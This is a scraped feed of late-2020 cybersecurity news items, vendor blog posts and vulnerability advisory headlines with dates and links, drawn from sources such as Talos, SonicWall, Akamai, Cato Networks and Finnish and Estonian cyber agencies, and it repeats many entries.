https://claroty.com/team82/disclosure-dashboard/cve-2020-7565-cve-2020-7566-cve-2020-7567-cve-2020-7568cve-2020-28214
Terminate Your MPLS Contract Early…Here’s How
2020-11-09T12:31:32Z | 1604925092

The post Terminate Your MPLS Contract Early…Here’s How appeared first on Cato Networks.

https://www.catonetworks.com/resources/terminate-your-mpls-contract-early-heres-how/
High Threat Security Alert (A20-11-02): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-11-06T04:00:00Z | 1604635200

Apple has released both iOS 14.2 and iPadOS 14.2 as well as iOS 12.4.9 to fix multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
BIMx Desktop Viewer Resource Parsing Integer Overflow Vulnerability
2020-11-06T00:00:00Z | 1604620800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1032
CVE-2020-10292
2020-11-06T00:00:00Z | 1604620800

EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR CWE-200: System information disclosure without authentication on KUKA simulators

https://claroty.com/team82/disclosure-dashboard/cve-2020-10292
CVE-2020-10291
2020-11-06T00:00:00Z | 1604620800

EXPOSURE OF SENSITIVE INFORMATION TO AN UNUATHORIZED ACTOR CWE-200: Kuka simulators disclose sensitive system information without authentication.

https://claroty.com/team82/disclosure-dashboard/cve-2020-10291cve-2020-10292
IntelMQ offers tutorial lessons and a new documentation page
2020-11-05T19:37:17Z | 1604605037

The IntelMQ tutorial guiding through various features and tools of IntelMQ is available in the IntelMQ Tutorial GitHub repository.Lesson one introduces the architecture, concepts and terminology of the project. Lessons two and three delve hands-on into working with IntelMQ. Starting with installation and basic usage & configuration they go on to tackle progressively more advanced topics like using advanced features or changing the message queue software to be used. Solutions and explanations are offered for all tasks. In the last lesson you'll learn how to use intelmq-tools, a third-party software which makes customization of your IntelMQ instance much easier. We think that this kind of interactive online documentation is especially important nowadays when conferences and workshops cannot take place in real life. As for all other IntelMQ components, we welcome any contributions and feedback to the tutorial. New IntelMQ Documentation page We completely revised the way IntelMQ's documentation is presented: Instead of single files in the source-code repository, the best place to read the documentation is now intelmq.readthedocs.io. All pages are generated using Sphinx, the de facto standard tool for documentation. It features a better reading experience and a significantly improved navigation. Furthermore, the new page offers an integrated search as well as module index covering the complete code documentation If you find any bugs or have improvements, please let us know! This blog post is part of a/related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/11/intelmq-tutorial-and-new-documentation-page
My Path to Akamai
2020-11-05T08:00:00Z | 1604563200

Three years ago, I graduated with a bachelor's degree in Electronic Engineering (Mechatronic) from University Tun Hussein Onn Malaysia. I was to be an engineer in the oil and gas industry - but the universe had a better plan for me. Instead, I stepped into IT, providing Technical Support despite my lack of knowledge. I was struggling! But it was there that I found my passion.

https://www.akamai.com/blog/culture/my-path-to-akamai-by-amirah-zahidah-binti-onn
Adobe Acrobat Reader DC JavaScript submitForm heap buffer overflow redux
2020-11-05T00:00:00Z | 1604534400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1157
Adobe Acrobat Reader DC form field format use after free
2020-11-05T00:00:00Z | 1604534400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1156
New tool for management to tackle cyber threats
2020-11-04T10:36:21Z | 1604486181

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom has created Kybermittari, a tool that helps corporate management face cyber risks and safeguard the continuity of business operations.

https://www.kyberturvallisuuskeskus.fi/en/news/new-tool-management-tackle-cyber-threats
New tool for management to tackle cyber threats
2020-11-04T10:36:21Z | 1604486181

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom has created Kybermittari, a tool that helps corporate management face cyber risks and safeguard the continuity of business operations.

https://www.kyberturvallisuuskeskus.fi/en/news/new-tool-management-tackle-cyber-threats
Aastakonverentsil kutsuti üles eksperte ja organisatsioone liituma EU CyberNeti võrgustikuga
2020-11-04T09:48:54Z | 1604483334

30. oktoobril toimus Tallinnas Kultuurikatlas Euroopa Liidu kübervõrgustiku EU CyberNet esimene aastakonverents. Ühendades klassikalist küberturvalisuse konverentsi internetis üle kantud virtuaalüritusega arutleti Euroopa Liidu küberarenguabi projektide üle, räägiti võimalustest seda abi koordineeritumalt ning tõhusamalt pakkuda ning ennustati, milline saab olema EU CyberNeti roll nendes tegevustes.

https://ria.ee/uudised/aastakonverentsil-kutsuti-ules-eksperte-ja-organisatsioone-liituma-eu-cyberneti
Security Alert (A20-11-01): Multiple Vulnerabilities in Adobe Reader/Acrobat
2020-11-04T04:00:00Z | 1604462400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Testing Shows How SASE Hones Threat Intelligence Feeds, Eliminates False Positives
2020-11-03T06:10:53Z | 1604383853

Threat Intelligence (TI) feeds provide critical information about attacker behavior for adapting an enterprise’s defenses to the threat landscape. Without these feeds, your security tools, and those used by your security provider would lack the raw intelligence needed to defend cyber operations and assets. But coming from open-source, shared communities, and commercial providers, TI feeds... The post Security Testing Shows How SASE Hones Threat Intelligence Feeds, Eliminates False Positives appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-testing-shows-how-sase-hones-threat-intelligence-feeds-eliminates-false-positives/
Moxa MXView series installation privilege escalation vulnerability
2020-11-03T00:00:00Z | 1604361600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1148
Rethinking Enterprise VPN Solutions: Designing Scalable VPN Connectivity
2020-11-02T08:36:57Z | 1604306217

The global pandemic has forced many organizations around the world to send their workers home to support social distancing mandates. The process happened suddenly – almost overnight – giving companies little time to prepare for so many people to work remotely. To keep business functioning as best as possible, enterprises need to provide secure remote... The post Rethinking Enterprise VPN Solutions: Designing Scalable VPN Connectivity appeared first on Cato Networks.

https://www.catonetworks.com/blog/rethinking-enterprise-remote-access-vpn-solutions-designing-scalable-vpn-connectivity/
The Dark Side of SD-WAN. Are You Prepared?
2020-11-02T07:56:26Z | 1604303786

The post The Dark Side of SD-WAN. Are You Prepared? appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-dark-side-of-sd-wan-are-you-prepared/
Keys to a Successful SASE Deployment
2020-11-01T15:28:49Z | 1604244529

The post Keys to a Successful SASE Deployment appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-38
RFP Template for your SD-WAN Project
2020-11-01T15:06:30Z | 1604243190

The post RFP Template for your SD-WAN Project appeared first on Cato Networks.

https://www.catonetworks.com/resources/rfp-template-for-your-sd-wan-project/
SASE RFP Made Easy – Get the Template
2020-11-01T14:25:29Z | 1604240729

The post SASE RFP Made Easy – Get the Template appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-rfi-rfp-template/
Good idea, bad design: How the Diamond standard falls short
2020-10-30T17:19:18Z | 1604078358

TL;DR: We audited an implementation of the Diamond standard proposal for contract upgradeability and can’t recommend it in its current form—but see our recommendations and upgrade strategy guidance. We recently audited an implementation of the Diamond standard code, a new upgradeability pattern. It’s a laudable undertaking, but the Diamond proposal and implementation raise many concerns. […]

https://blog.trailofbits.com/2020/10/30/good-idea-bad-design-how-the-diamond-standard-falls-short/
Phishing JavaScript Obfuscation Techniques Soars
2020-10-30T07:00:00Z | 1604041200

In our previous blogs, first where we explained JavaScript Obfuscation techniques and introduced a detailed overview on how JavaScript is being used to obfuscate page content to make phishing attacks and other web scams as evasive as possible; followed by one where we took a deep dive to examine double JavaScript obfuscation techniques, presenting a tale of an obfuscated scam seen in the wild and showing how the same phishing campaign is using numerous obfuscation techniques in an attempt to remain hidden.

https://www.akamai.com/blog/security/phishing-javascript-obfuscation-techniques-soars
Onboarding During A Pandemic: Can It Really Work? New Joiner, Lily Nguyen, Shares Her Experience.
2020-10-30T04:00:00Z | 1604030400

I recently joined the Sales Development APAC team, looking after the Vietnam, Thailand and Hong Kong markets. I'd already had a great impression of Akamai's culture from my interview rounds. But how would the onboarding work? I'd been looking forward to meeting new colleagues in an office environment. I wanted to feel part of a new team; that sense of collaboration you get from personal interaction. Instead, I only got to meet our IT guy outside the office who presented me with my MacBook Pro.

https://www.akamai.com/blog/culture/onboarding-during-a-pandemic-can-it-really-work-new-joiner-lily-nguyen
Synology SRM web interface session cookie HttpOnly flag information disclosure vulnerability
2020-10-30T00:00:00Z | 1604016000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1086
NCSC statement following US advisory on ransomware targeting of US health sector
2020-10-29T15:05:57Z | 1603983957

The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have published an advisory on the threat of Ryuk ransomware.

https://www.ncsc.gov.uk/news/statement-ransomware-targeting-us-health-sector
The Tale of Double JavaScript Obfuscated Scam
2020-10-29T01:02:00Z | 1603933320

The phishing landscape is constantly evolving. Over the years, it has evolved into a more scalable threat, with an overwhelming amount of campaigns being launched daily. Phishing also changed when criminals started adding more capabilities and features to their toolkits, which make the phishing websites long lived and difficult to detect.

https://www.akamai.com/blog/security/the-tale-of-double-javascript-obfuscated-scam
Synology SRM lbd service Command Execution Vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1065
Synology SRM QuickConnect HTTP connection Information Disclosure Vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1061
Synology SRM QuickConnect iptables network misconfiguration vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1066
Synology SRM QuickConnect authentication Information Disclosure Vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1058
Synology SRM web interface session cookie secure flag Information Disclosure Vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1059
Synology SRM dnsExit DDNS provider information disclosure vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1071
Synology QuickConnect servers network misconfiguration vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1064
Synology QuickConnect servers HTTP redirection Information Disclosure Vulnerability
2020-10-29T00:00:00Z | 1603929600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1060
WAN Overlay and Underlay Projects: Better Together?
2020-10-28T10:19:35Z | 1603880375

Anyone who is considering SD-WAN for their WAN transformation project must be a bit anxious about the transition of last mile access to the Internet. Instead of MPLS from a single telco, a whole slew of ISPs provide the Internet underlay in various geographies (Cato created specific content and best practices to help guide customers... The post WAN Overlay and Underlay Projects: Better Together? appeared first on Cato Networks.

https://www.catonetworks.com/blog/wan-overlay-and-underlay-projects-better-together/
SonicWall Global VPN client version 4.10.4.0314 and earlier have an insecure library loading (DLL hijacking) vulnerability
2020-10-28T09:39:18Z | 1603877958

SonicWall Global VPN client version 4.10.4.0314 and earlier have an insecure library loading (DLL hijacking) vulnerability. Successful exploitation could lead to remote code execution in the target system. CVE: CVE-2020-5145 Last updated: Oct. 28, 2020, 9:39 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0021
SonicWall Global VPN client version 4.10.4.0314 and earlier allows privilege elevation through loaded process hijacking vulnerability
2020-10-28T09:31:38Z | 1603877498

SonicWall Global VPN client version 4.10.4.0314 and earlier allows unprivileged windows user to elevate privileges to SYSTEM through loaded process hijacking vulnerability. CVE: CVE-2020-5144 Last updated: Oct. 28, 2020, 9:31 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0020
Akamai Edge Cloud: Scaling IoT, Part 2
2020-10-27T15:00:00Z | 1603810800

IoT has tremendous possibilities to transform our world but will fall short of expectations if the underlying infrastructure cannot support the rapid exchange of massive amounts of information from billions of simultaneous and intermittent connections. Akamai Edge Cloud is designed to enable the potential of IoT by utilizing the deep knowledge we've gained operating one of the world's largest edge networks.

https://www.akamai.com/blog/developers/akamai-edge-cloud--scaling-iot--part-2
Guest writer: Online scams concern us all
2020-10-27T11:37:15Z | 1603798635

The telephone hotline operated by the Huijarit kuriin (“Stop the Scammers”) project receives calls from both seniors and young people. While seniors have formed the majority of audiences at the project’s training events, its webinars have seen younger attendees. When combating online scams, the best approach is to focus on digital skills rather than age groups or the differences between younger and older internet users. It may well be that your grandma knows better than you do! Our guest writer is Tapani Veija, who manages the Huijarit kuriin project organised by the Consumers’ Union of Finland.

https://www.kyberturvallisuuskeskus.fi/en/news/guest-writer-online-scams-concern-us-all
Guest writer: Online scams concern us all
2020-10-27T11:37:15Z | 1603798635

The telephone hotline operated by the Huijarit kuriin (“Stop the Scammers”) project receives calls from both seniors and young people. While seniors have formed the majority of audiences at the project’s training events, its webinars have seen younger attendees. When combating online scams, the best approach is to focus on digital skills rather than age groups or the differences between younger and older internet users. It may well be that your grandma knows better than you do! Our guest writer is Tapani Veija, who manages the Huijarit kuriin project organised by the Consumers’ Union of Finland.

https://www.kyberturvallisuuskeskus.fi/en/news/guest-writer-online-scams-concern-us-all
At KONE, cyber exercises help in developing the information security measures of the future
2020-10-27T11:35:12Z | 1603798512

Is your organisation interested in cyber exercises, but unsure of where to begin? The National Cyber Security Centre Finland (NCSC-FI) provides regular support to organisations undertaking cyber exercises, and we have asked some of these organisations to write about the experience. This time we learned about cyber exercises at KONE.

https://www.kyberturvallisuuskeskus.fi/en/news/kone-cyber-exercises-help-developing-information-security-measures-future
At KONE, cyber exercises help in developing the information security measures of the future
2020-10-27T11:35:12Z | 1603798512

Is your organisation interested in cyber exercises, but unsure of where to begin? The National Cyber Security Centre Finland (NCSC-FI) provides regular support to organisations undertaking cyber exercises, and we have asked some of these organisations to write about the experience. This time we learned about cyber exercises at KONE.

https://www.kyberturvallisuuskeskus.fi/en/news/kone-cyber-exercises-help-developing-information-security-measures-future
ATA 8.0 Graduation Ceremony
2020-10-27T07:00:00Z | 1603782000

Akamai Technical Academy is a training program designed for people who have an interest and aptitude for technology but may not come from a traditional technical background. Up until now, we have successfully onboarded over 140 incredible people in three Akamai locations: Cambridge (MA, US), San Jose (Costa Rica) and Krakow (Poland).

https://www.akamai.com/blog/culture/ata-8-0-graduation-ceremony-by-magda-bukala
5G, Security, IoT, Asavie, and Akamai
2020-10-27T04:00:00Z | 1603771200

Malicious actors never rest and have always worked remotely. That simple realization hit home during recent global events. Specifically, Akamai saw an increase in malware traffic of over 400% between March 9 and May 11, 2020 from corporate devices, most of which were being used outside of a traditional office environment.

https://www.akamai.com/blog/news/5g-security-iot-asavie-and-akamai
All possible measures should be taken to protect victims: Find all the necessary information in one place at Tietovuotoapu.fi
2020-10-26T14:19:26Z | 1603721966

The Finnish Transport and Communications Agency Traficom has worked with other public authorities and organisations to create the Tietovuotoapu.fi website, which houses all the information relevant to helping the victims of the data breach targeting psychotherapy centre Vastaamo. The site provides advice on the steps victims should take and lists the details of organisations they can contact for assistance.

https://www.kyberturvallisuuskeskus.fi/en/news/all-possible-measures-should-be-taken-protect-victims-find-all-necessary-information-one-0
All possible measures should be taken to protect victims: Find all the necessary information in one place at Tietovuotoapu.fi
2020-10-26T14:19:26Z | 1603721966

The Finnish Transport and Communications Agency Traficom has worked with other public authorities and organisations to create the Tietovuotoapu.fi website, which houses all the information relevant to helping the victims of the data breach targeting psychotherapy centre Vastaamo. The site provides advice on the steps victims should take and lists the details of organisations they can contact for assistance.

https://www.kyberturvallisuuskeskus.fi/en/news/all-possible-measures-should-be-taken-protect-victims-find-all-necessary-information-one-0
Catch Me if You Can?JavaScript Obfuscation
2020-10-26T04:00:00Z | 1603684800

While conducting threat research on phishing evasion techniques, Akamai came across threat actors using obfuscation and encryption, making the malicious page harder to detect. The criminals were using JavaScript to pull this off....

https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation
Questions and answers for victims of identity theft or data leaks
2020-10-25T09:02:51Z | 1603616571

The National Cyber Security Centre Finland has received many questions concerning blackmail emails related to the Vastaamo customer data breach. We will respond to the messages as soon as possible. In situations like this, the victims and their loved ones naturally have many questions about the right course of action. Below, you will find the most frequently asked questions with answers and advice about what to do if your personal information has been leaked online, or if you suspect your personal information has been leaked. The page is updated as new information comes in.

https://www.kyberturvallisuuskeskus.fi/en/news/questions-and-answers-victims-identity-theft-or-data-leaks
Questions and answers for victims of identity theft or data leaks
2020-10-25T09:02:51Z | 1603616571

The National Cyber Security Centre Finland has received many questions concerning blackmail emails related to the Vastaamo customer data breach. We will respond to the messages as soon as possible. In situations like this, the victims and their loved ones naturally have many questions about the right course of action. Below, you will find the most frequently asked questions with answers and advice about what to do if your personal information has been leaked online, or if you suspect your personal information has been leaked. The page is updated as new information comes in.

https://www.kyberturvallisuuskeskus.fi/en/news/questions-and-answers-victims-identity-theft-or-data-leaks
Advice for victims of identity theft or data breaches
2020-10-25T08:42:01Z | 1603615321

Identity theft can take place following a data breach, for example. Keep reading for advice on how to proceed if you have been targeted by identity theft or your personal data has been made public as a result of a data breach.

https://www.kyberturvallisuuskeskus.fi/en/news/advice-victims-identity-theft-or-data-breaches
Advice for victims of identity theft or data breaches
2020-10-25T08:42:01Z | 1603615321

Identity theft can take place following a data breach, for example. Keep reading for advice on how to proceed if you have been targeted by identity theft or your personal data has been made public as a result of a data breach.

https://www.kyberturvallisuuskeskus.fi/en/news/advice-victims-identity-theft-or-data-breaches
Neli soovitust ettevõtjale küberrünnakute ennetamiseks
2020-10-24T07:44:01Z | 1603525441

Küberrünnakute arv Eestis kasvab ja küberkurjategijad kimbutavad kohalikke ettevõtteid iga päev. Ühtlasi muutuvad kurjategijad aina kavalamaks, mis eeldab ettevõtjatelt enda töötajate, vara ja maine kaitsmiseks üha suuremat tähelepanu. Riigi Infosüsteemi Ameti infoturbe ekspert Joosep Sander Juhanson tõi välja neli soovitust firmajuhtidele küberrünnakute ennetamiseks.

https://ria.ee/uudised/neli-soovitust-ettevotjale-kuberrunnakute-ennetamiseks
Efficient audits with machine learning and Slither-simil
2020-10-23T11:00:51Z | 1603450851

Trail of Bits has manually curated a wealth of data—years of security assessment reports—and now we’re exploring how to use this data to make the smart contract auditing process more efficient with Slither-simil. Based on accumulated knowledge embedded in previous audits, we set out to detect similar vulnerable code snippets […]

https://blog.trailofbits.com/2020/10/23/efficient-audits-with-machine-learning-and-slither-simil/
A vulnerability in the SonicWall Capture Security Center was allowing access to the managed firewall without authentication
2020-10-22T19:56:34Z | 1603396594

A vulnerability in the SonicWall Capture Security Center - Cloud Security Management Service was allowing users to access managed firewalls without authentication, this issue has been resolved and a security patch has been pushed out to all affected Capture Security Center - Management and Analytics (CSC-MA) servers. CVE: N/A Last updated: Oct. 22, 2020, 7:56 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0019
Development of the „Constituency-Portal“ 2.0
2020-10-22T11:45:44Z | 1603367144

Dieser Blogpost ist auch auf Deutsch verfügbar. Our partner Intevation GmbH develops the next generation of the "Consituency-Portal", our tool for administration of contact information. The new version follows the current version, which is a further developed „do-portal“ (originally developed by CERT-EU). Since 2017 we adapted this software to our needs within the scope of CEF 2016-AT-IA-0089. Over the years our requirements grew significantly and the software architecture was no longer able to stand up to those, also the code maintenance got harder over time. Therefore, we decided for a new version of the software in spring this year: The software design will be majorly enhanced and will be based on Laravel and PHP. With the new version of the Constituency-Portal, we will be able to better address our daily CERT notifications to network owners with our tool IntelMQ, by a targeted attribution of networks and domains to the organisations. It is planned, that the address data can be self-managed by the Constituency themself. For this purpose the network owners will have the possibility to create user accounts themselves. The authentication will be managed by Keycloak, with which services to be developed in the future by AEC/CERT.at and GovCERT can be integrated as well. The development of the Software is performed by Intevation GmbH from Osnabrück, Germany, as Free Software until summer 2021 and is financed in large parts by CEF 2018-AT-IA-0111. Intevation did already substantially advance IntelMQ as part of other projects. The open development mode emphasizes our engagement for Free Software and the international CERT-community. The tool will be available for other CERTs/CSIRTs as well. The code-repository can be found at gitlab. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/10/development-of-the-constituency-portal-20
Let’s build a high-performance fuzzer with GPUs!
2020-10-22T10:00:14Z | 1603360814

TL;DR: Can we use GPUs to get 10x performance/dollar when fuzzing embedded software in the cloud? Based on our preliminary work, we think the answer is yes! Fuzzing is a software testing technique that supplies programs with many randomized inputs in an attempt to cause unexpected behavior. It’s an important, […]

https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
Security Alert (A20-10-07): Multiple Vulnerabilities in Cisco Products
2020-10-22T04:00:00Z | 1603339200

Cisco released security advisories to address multiple vulnerabilities in Cisco product running Cisco FXOS Software, Cisco Adaptive Security Appliance (ASA) Software, Firepower Threat Defense (FTD) Software or Cisco Firepower Management Center (FMC) Software.

https://www.govcert.gov.hk/en/alerts_detail.php
Google Chrome DrawElementsInstanced information leak vulnerability
2020-10-22T00:00:00Z | 1603324800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1123
How to Best Optimize Global Access to Cloud Applications
2020-10-21T08:19:32Z | 1603268372

The post How to Best Optimize Global Access to Cloud Applications appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-best-optimize-global-access-to-cloud-applications/
Security Alert (A20-10-04): Multiple Vulnerabilities in Firefox
2020-10-21T04:00:00Z | 1603252800

Mozilla has published two security advisories (MFSA 2020-45 and MFSA 2020-46) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-10-05): Multiple Vulnerabilities in VMware Products
2020-10-21T04:00:00Z | 1603252800

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A20-10-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2020)
2020-10-21T04:00:00Z | 1603252800

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST launches new code of ethics for incident response and security teams on Global Ethics Day
2020-10-21T00:00:00Z | 1603238400

October 21, 2020 – following a global consultation, the Forum of Incident Response and Security Teams (FIRST) is launching new ethics guidelines for incident response and security teams today on Global Ethics Day. ethicsfIRST provides guidance for cybersecurity professionals on how to conduct themselves professionally and ethically during incidents. Inspired by Earth Day, Global Ethics Day provides an opportunity for organizations to explore the meaning of ethics in international affairs

https://www.first.org/newsroom/releases/20201021
FIRST launches new code of ethics for incident response and security teams on Global Ethics Day
2020-10-21T00:00:00Z | 1603238400

October 21, 2020 – following a global consultation, the Forum of Incident Response and Security Teams (FIRST) is launching new ethics guidelines for incident response and security teams today on Global Ethics Day. ethicsfIRST provides guidance for cybersecurity professionals on how to conduct themselves professionally and ethically during incidents. Inspired by Earth Day, Global Ethics Day provides an opportunity for organizations to explore the meaning of ethics in international affairs

https://www.first.org/newsroom/releases/20201021
Our new guide helps small businesses shore up their cyber security
2020-10-20T13:27:33Z | 1603200453

Information security breaches can cause significant financial and reputational harm to small businesses. With the help of our new guide, small business owners can protect themselves against the most common cyber threats.

https://www.kyberturvallisuuskeskus.fi/en/news/our-new-guide-helps-small-businesses-shore-their-cyber-security
Our new guide helps small businesses shore up their cyber security
2020-10-20T13:27:33Z | 1603200453

Information security breaches can cause significant financial and reputational harm to small businesses. With the help of our new guide, small business owners can protect themselves against the most common cyber threats.

https://www.kyberturvallisuuskeskus.fi/en/news/our-new-guide-helps-small-businesses-shore-their-cyber-security
Scam messages and Zerologon vulnerability brought stormy cyber skies in September
2020-10-20T13:25:02Z | 1603200302

Did you receive a text message about an arrived parcel or letter? Scam messages sent in Posti's name have targeted thousands of Finns recently. September’s cyber weather also featured dreary spells due to the Zerologon vulnerability and Emotet malware strain.

https://www.kyberturvallisuuskeskus.fi/en/news/scam-messages-and-zerologon-vulnerability-brought-stormy-cyber-skies-september
Scam messages and Zerologon vulnerability brought stormy cyber skies in September
2020-10-20T13:25:02Z | 1603200302

Did you receive a text message about an arrived parcel or letter? Scam messages sent in Posti's name have targeted thousands of Finns recently. September’s cyber weather also featured dreary spells due to the Zerologon vulnerability and Emotet malware strain.

https://www.kyberturvallisuuskeskus.fi/en/news/scam-messages-and-zerologon-vulnerability-brought-stormy-cyber-skies-september
2020 DDoS Extortion Campaign -- A Sequel More Thrilling Than the Original
2020-10-20T04:00:00Z | 1603166400

As the go-to enterprise distributed denial-of-service (DDoS) mitigation experts, our phones have been "ringing off the hook" since the release of the global extortion DDoS campaign sequel. This latest installment of the cybersecurity saga is bigger, badder, and features a broader cast of criminal characters than seen previously with last year's extortion-related activity.

https://www.akamai.com/blog/security/2020-ddos-extortion-campaign-a-sequel-more-thrilling-than-the-original
Google Chrome WebGL Buffer11::getBufferStorage Code Execution Vulnerability
2020-10-20T00:00:00Z | 1603152000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1127
Can Edge Computing Exist Without the Edge? Part 1: The Edge
2020-10-19T04:00:00Z | 1603080000

If the title sounds like a trick question, it really depends on who you ask. Semantically, it seems clear that if you take the "edge" and combine it with "computing" you get edge computing. But if you have been reading headlines, you would be justified in having doubts that the answer is that simple.

https://www.akamai.com/blog/edge/can-edge-computing-exist-without-the-edge-part-1-the-edge
Gartner’s 9 Criteria For SD-WAN Selection: A Cato Response
2020-10-18T13:35:06Z | 1603028106

The post Gartner’s 9 Criteria For SD-WAN Selection: A Cato Response appeared first on Cato Networks.

https://www.catonetworks.com/resources/gartners-9-criteria-for-sd-wan-selection-a-cato-response/
Why SASE Must Support ALL Edges, ALL Traffic, and ALL Applications
2020-10-18T11:40:42Z | 1603021242

As SASE becomes more widely adopted in the industry, there are wide discrepancies in the use of the term. In its August 2019 report, The Future of Network Security Is in the Cloud, Gartner saw SASE (Secure Access Service Edge) as creating a single network for the complete enterprise, connecting and securing all edges everywhere.... The post Why SASE Must Support ALL Edges, ALL Traffic, and ALL Applications appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-sase-must-support-all-edges-all-traffic-and-all-applications/
DDoS Extortion Examination
2020-10-16T04:00:00Z | 1602820800

In terms of the Distributed Denial of Service (DDoS) landscape, 2020 was almost boring prior to the beginning of August. The excitement from the record peak Gbps and Mpps seen in early summer had worn off, and we weren't seeing...

https://www.akamai.com/blog/security/ddos-extortion-examination
Pahavara kolmas laine tabas Eestit – enne klikkimist kontrolli saatja aadressi!
2020-10-15T22:06:26Z | 1602799586

Riigi infosüsteemi ameti monitooring ja partneritelt tulnud info näitavad, et e-kirja dokumentidesse, failidesse või linkide taha peidetud Emoteti pahavara nakatas Eestis veel suure hulga arvuteid.

https://ria.ee/uudised/pahavara-kolmas-laine-tabas-eestit-enne-klikkimist-kontrolli-saatja-aadressi
Security Alert (A20-10-03): Vulnerability in SonicWall Products
2020-10-15T04:00:00Z | 1602734400

SonicWall released a security advisory to address a buffer overflow vulnerability in SonicOS which is the operating system for SonicWall firewalls.

https://www.govcert.gov.hk/en/alerts_detail.php
Why Take It to the Edge
2020-10-15T04:00:00Z | 1602734400

Edge computing is the next natural paradigm shift in IT, bringing a new wave of decentralization. Over the past decade, IT has embraced two seemingly juxtaposed trends: the consolidation of infrastructure and data in private, public, or hybrid clouds, and the growing distribution and diversity of devices that access them. How can these trends continue to coexist? The answer is at the edge.

https://www.akamai.com/blog/news/why-take-it-to-the-edge
Osquery: Using D-Bus to query systemd data
2020-10-14T12:00:17Z | 1602676817

During my summer internship at Trail of Bits I worked on osquery, the massively popular open-source endpoint monitoring agent used for intrusion detection, threat hunting, operational monitoring, and many other functions. Available for Windows, macOS, Linux, and FreeBSD, osquery exposes an operating system as a high-performance relational database, […]

https://blog.trailofbits.com/2020/10/14/osquery-using-d-bus-to-query-systemd-data/
Cato Demo: What a modern, SASE-based network monitoring should really look like – Mark Bayne
2020-10-14T07:46:35Z | 1602661595

The post Cato Demo: What a modern, SASE-based network monitoring should really look like – Mark Bayne appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-demo-what-a-modern-sase-based-network-monitoring-should-really-look-like-mark-bayne/
High Threat Security Alert (A20-10-01): Multiple Vulnerabilities in Microsoft Products (October 2020)
2020-10-14T04:00:00Z | 1602648000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-10-02): Vulnerability in Adobe Flash Player
2020-10-14T04:00:00Z | 1602648000

Adobe has released security updates to address a vulnerability in Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
What's New in Security (Part 2)
2020-10-14T04:00:00Z | 1602648000

Welcome to the Akamai Platform Update! We're presenting an entire week of learning about Akamai's recent product updates. Each day, we'll highlight our latest innovations in each area of the Akamai Intelligent Platform.

https://www.akamai.com/blog/security/whats-new-in-security-part-2
F2fs-Tools F2fs.Fsck filesystem checking Information Disclosure Vulnerability
2020-10-14T00:00:00Z | 1602633600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1046
F2fs-Tools F2fs.Fsck dev_read Information Disclosure Vulnerability
2020-10-14T00:00:00Z | 1602633600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1049
F2fs-Tools F2fs.Fsck fsck_chk_orphan_node Code Execution Vulnerability
2020-10-14T00:00:00Z | 1602633600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1050
F2fs-Tools F2fs.Fsck init_node_manager Information Disclosure Vulnerability
2020-10-14T00:00:00Z | 1602633600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1048
F2fs-Tools F2fs.Fsck Multiple Devices Code Execution Vulnerability
2020-10-14T00:00:00Z | 1602633600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1047
